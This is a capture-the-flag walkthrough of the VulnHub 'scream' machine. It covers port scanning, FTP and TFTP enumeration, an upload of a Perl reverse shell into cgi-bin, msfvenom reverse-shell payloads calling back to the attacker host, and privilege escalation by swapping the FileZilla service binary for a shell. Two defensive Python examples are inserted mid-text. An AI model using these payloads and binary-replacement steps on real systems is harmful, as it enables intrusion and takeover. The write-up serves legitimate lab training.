VulnHub: /dev/random: scream

ratiros01
9 min read · May 1, 2021


Initial foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.28.

2. Port scan

nmap -Pn 10.0.2.28
nmap -Pn -p1000- 10.0.2.28

There’re 4 open ports: 21, 22, 23, and 80.

3. OS and service scan

nmap -A -p21,22,23,80 10.0.2.28

The services identified are:

  • Port 21 WAR-FTPD 1.65 w/ anonymous login
  • Port 22 WeOnlyDo sshd 2.1.3 (protocol 2.0)
  • Port 23 telnet
  • Port 80 Tinyweb httpd 1.93

4. Vuln scan

nmap --script vuln -p21,22,23,80 10.0.2.28

No useful information.

Service Enumeration and exploitation

1. FTP

Anonymous login

ftp 10.0.2.28
Name: anonymous
Password: (empty)

Explore its directory

ls -la
get bin

I don’t have any permission except READ.

Continue exploring

cd /bin
ls -la

TINY.EXE suggests that this /bin belongs to the Tinyweb httpd service.

cd ../log
ls -la

There are several logs; the interesting one is OpenTFTPServerMT.log, which suggests a TFTP server may be running on this machine.

cd ../root
ls -la

There are index.html and cgi-bin, so this directory is probably the document root of Tinyweb httpd.

cd cgi-bin
ls -la

No data here.

Next is to search for a public exploit script.

After searching for any exploits w/ google, I came across this.

When you read the code, you’ll notice winsock.h. This script is meant to be compiled on Windows.

In my experience, compiling this kind of script from the Linux command line runs into many problems. So I will use wine to install Dev-C++, compile the script with Dev-C++ to get an exe file, and finally run the exe with wine again.

First, download Orwell Dev-C++

wine Orwell\ Dev\ C++_5.7.1_Soft32.exe

Continue the installation process just as on Windows

Copy the code

On compiling, I encountered errors.

After googling, I found that I need to add “-lws2_32” to the compiler option.

Click Tools -> Compiler Options and add “-lws2_32” as shown in the snapshot.

Compile again, now I got an exe file.

Run the exe w/ wine

wine 3570.exe

Supply an option. Since the target system is XP SP3, I'll try the options closest to the target.

wine 3570.exe 10.0.2.28 5

Connect to port 7777

telnet 10.0.2.28 7777

No shell

Use another option

wine 3570.exe 10.0.2.28 13

Connect to port 7777

telnet 10.0.2.28 7777

No shell

I also found another python script that was tested on Windows XP SP3. I’ll try to use this.

Read the script

I have to generate new shellcode matching my attacking machine. Here is my command.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows

Copy new shellcode to the python script and edit target IP.

Create Listener on port 443

rlwrap nc -lvp 443

Run the script

python warftp-ftp.py

Back at the listener, no shell. I'll proceed to the next service.

2. SSH

Connect

ssh 10.0.2.28

No matching key exchange found. Cannot connect.

Specify algorithm and encryption method

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc 10.0.2.28

Now I can connect.

Search for public exploits

Open metasploit and search for exploits

msfconsole
search freesshd
use 2
show options
set RHOST 10.0.2.28
set LHOST 10.0.2.27
set LPORT 443
run -j

Failed. I’ll proceed to the next service.

3. Telnet

Connect

telnet 10.0.2.28 23

I don’t have any credentials.

4. HTTP

Access the site

View page source

Nikto

nikto -h http://10.0.2.28

Nothing

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q

Nothing

5. Remember from the FTP enumeration that there is a TFTP log. TFTP is a file transfer protocol running over UDP port 69, so I'll scan for open UDP ports.

nmap -sU -sV 10.0.2.28 -vvvv

There’s open UDP port 69.

6. TFTP

Recall from the FTP enumeration that there is a cgi-bin directory; a Perl reverse shell script could be uploaded there.

I'll upload test.txt first; before that I switch TFTP to binary mode

mode binary
put test.txt root/cgi-bin -> failed
put test.txt /cgi-bin -> failed
put test.txt cgi-bin/ -> failed
put test.txt cgi-bin/test.txt -> succeeded

Now access /cgi-bin/test.txt

http://10.0.2.28/cgi-bin/test.txt

I can upload the file, but it is not executed.

Next, upload the Perl “Hello World” script from this guide

put helloworld.pl cgi-bin/helloworld.pl -> succeeded

Access via http
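The upload attempts above show the TFTP root is shared with the web server's document root, so a write into cgi-bin is a write into executable space. As an added example (not from the original post, and not OpenTFTPServer's code), the check below first mimics the permissive path resolution the post observed for the four put attempts, then applies the hardened rule a defender would want: refuse writes into cgi-bin or with executable extensions. The /www/root root and the cgi-bin directory come from the post; the existing-directory list and the extension set are assumptions.

```python
from pathlib import PurePosixPath

# Layout taken from the post: the TFTP root is \www\root, which is also the
# Tinyweb document root, and cgi-bin sits directly under it.
TFTP_ROOT = PurePosixPath("/www/root")
EXISTING_DIRS = {"cgi-bin"}          # constructed: directories present under the TFTP root
EXEC_DIRS = {"cgi-bin"}              # the web server executes whatever lands here
EXEC_EXTS = {".pl", ".exe", ".cgi", ".bat", ".cmd"}   # assumed executable extensions

def resolve(requested):
    """Mimic how a permissive TFTP server turns a WRQ filename into a target.
    Returns (True, resolved_path) or (False, reason). Only the first path
    component is checked for existence, which is enough for the post's attempts."""
    name = requested.replace("\\", "/")
    if not name or name.startswith("/") or name.endswith("/"):
        return False, "not a relative file path"
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return False, "empty path or traversal"
    if len(parts) > 1 and parts[0] not in EXISTING_DIRS:
        return False, "no such directory: " + parts[0]
    return True, str(TFTP_ROOT.joinpath(*parts))

def hardened_write_check(requested):
    """Same resolution, then refuse anything the web server would execute."""
    ok, result = resolve(requested)
    if not ok:
        return "deny", result
    target = PurePosixPath(result)
    rel = target.relative_to(TFTP_ROOT)
    if rel.parts[0] in EXEC_DIRS:
        return "deny", "write into executable directory " + rel.parts[0]
    if target.suffix.lower() in EXEC_EXTS:
        return "deny", "executable extension " + target.suffix
    return "allow", result

# The four put attempts from the post, plus the Perl upload and a harmless file.
ATTEMPTS = ["root/cgi-bin", "/cgi-bin", "cgi-bin/", "cgi-bin/test.txt",
            "cgi-bin/helloworld.pl", "notes.txt"]

if __name__ == "__main__":
    for a in ATTEMPTS:
        permissive = "ok" if resolve(a)[0] else "failed"
        print(f"{a:24} permissive={permissive:6} hardened={hardened_write_check(a)[0]}")
```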

Exploitation

1. Prepare a listener on port 443

rlwrap nc -lvp 443

2. Create the reverse shell script; I used this guide

Copy only the Perl code and edit the IP and port to match your listener

Upload it

put exploit.pl cgi-bin/exploit.pl

Accessing it gives an error.

I edited the script as shown in the snapshot.

Upload again

put exploit.pl cgi-bin/exploit2.pl

Access it

3. Back at the listener, I now have a shell

4. Verify the shell

echo %username%

Privilege Escalation

1. List system info

systeminfo

This machine is 32-bit.

2. List system tasks

tasklist /FI "username eq SYSTEM"

I will replace one of these exe files with a reverse shell. I'll start with “FileZilla server.exe”, because I don't have any permission except READ.

Let's change directory to “\”

cd \
dir

I could not change directory as expected. I need a more reliable shell.

3. Create and upload another shell

Create a listener on port 80

rlwrap nc -lvp 80

Create an exe shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell.exe

Upload it with tftp

put shell.exe cgi-bin/shell.exe

Run it from the existing shell (the one on the port 443 listener)

dir
shell.exe

Back at the listener on port 80, I got another shell

4. Replacing FileZilla

In the shell on the port 80 listener

Find the path of FileZilla server.exe

dir "FileZilla server.exe" /s /b

Find the service name

net start

Stop the service

net stop "FileZilla Server FTP server"

Next is replacing it with another reverse shell

Back on the attacker machine, create an exe reverse shell calling back to port 21 (the listener created below)

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=21 -e x86/shikata_ga_nai -f exe > shell2.exe

Upload w/ tftp

put shell2.exe cgi-bin/shell2.exe

Create listener on port 21

rlwrap nc -lvp 21

Back in the existing shell

cd \Program Files\FileZilla Server\
dir

Rename the old exe file as a backup

rename "FileZilla server.exe" "FileZilla server.exe.bak"
dir

Copy shell2.exe over the FileZilla binary

copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"
dir

Start the FileZilla service

net start "FileZilla Server FTP server"

Back at the listener on port 21; judging by the path, I'm administrator (root).
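The swap above leaves two traces a defender can check for: the service image no longer matches its install-time hash, and the renamed original sits beside it. As an added example (not from the post and not FileZilla's or any product's code), the Python below runs that check over a constructed temporary directory mirroring the FileZilla Server layout; the hash baseline and the "image.*" sibling rule are assumptions.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path):
    """Hash a file in chunks so large service binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def check_service_binaries(baseline):
    """baseline maps service image path -> expected sha256 (assumed to have
    been recorded at install time). Returns a list of (path, finding) tuples."""
    findings = []
    for image, expected in baseline.items():
        p = Path(image)
        if not p.is_file():
            findings.append((image, "missing"))
            continue
        if sha256_of(p) != expected:
            findings.append((image, "hash mismatch: binary replaced or modified"))
        # A renamed original such as "FileZilla server.exe.bak" left beside the
        # image is a second signal that a swap took place.
        for sib in sorted(p.parent.glob(p.name + ".*")):
            findings.append((str(sib), "renamed copy of service binary beside it"))
    return findings

def demo():
    """Constructed scenario mirroring the post: the original service binary is
    renamed to .bak and another executable takes its name."""
    with tempfile.TemporaryDirectory() as d:
        svc_dir = Path(d) / "FileZilla Server"
        svc_dir.mkdir()
        image = svc_dir / "FileZilla server.exe"
        image.write_bytes(b"MZ original FileZilla server (constructed)")
        baseline = {str(image): sha256_of(image)}
        clean = check_service_binaries(baseline)      # nothing to report yet
        image.rename(svc_dir / "FileZilla server.exe.bak")
        image.write_bytes(b"MZ something else entirely (constructed)")
        return clean, check_service_binaries(baseline)

if __name__ == "__main__":
    before, after = demo()
    print("before swap:", before)
    for path, finding in after:
        print(f"{finding}: {path}")
```

In production the baseline would be taken from the services' configured image paths (for example the output of `net start` and `dir /s /b` shown above) right after installation, and the check scheduled to run regularly.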
